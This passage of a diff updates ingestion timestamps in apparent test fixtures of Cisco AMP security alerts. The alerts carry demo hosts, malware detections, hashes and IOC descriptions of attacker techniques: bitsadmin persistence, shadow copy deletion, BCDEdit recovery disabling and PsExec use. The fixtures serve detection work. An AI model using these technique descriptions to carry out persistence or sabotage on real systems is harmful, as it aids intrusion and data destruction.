01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", @@ -543,7 +543,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222437500Z", + "ingested": "2021-12-14T14:40:34.011385529Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", @@ -621,7 +621,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222443100Z", + "ingested": "2021-12-14T14:40:34.011385934Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", @@ -700,7 +700,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222448800Z", + "ingested": "2021-12-14T14:40:34.011386403Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", @@ -787,7 +787,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222454500Z", + "ingested": "2021-12-14T14:40:34.011386871Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "code": "1107296274", "kind": "alert", @@ -874,7 +874,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222460200Z", + "ingested": "2021-12-14T14:40:34.011387280Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", @@ -961,7 +961,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222464300Z", + "ingested": "2021-12-14T14:40:34.011387867Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1048,7 +1048,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222469Z", + "ingested": "2021-12-14T14:40:34.011388410Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1135,7 +1135,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222474300Z", + "ingested": "2021-12-14T14:40:34.011388818Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1216,7 +1216,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222479200Z", + "ingested": "2021-12-14T14:40:34.011389466Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", @@ -1289,7 +1289,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222483300Z", + "ingested": "2021-12-14T14:40:34.011389987Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", @@ -1362,7 +1362,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222488100Z", + "ingested": "2021-12-14T14:40:34.011390578Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", @@ -1435,7 +1435,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222493900Z", + "ingested": "2021-12-14T14:40:34.011391041Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", @@ -1508,7 +1508,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222498300Z", + "ingested": "2021-12-14T14:40:34.011391475Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", @@ -1602,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222502500Z", + "ingested": "2021-12-14T14:40:34.011391928Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1686,7 +1686,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222506Z", + "ingested": "2021-12-14T14:40:34.011392418Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1776,7 +1776,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222510400Z", + "ingested": "2021-12-14T14:40:34.011393061Z", "original": 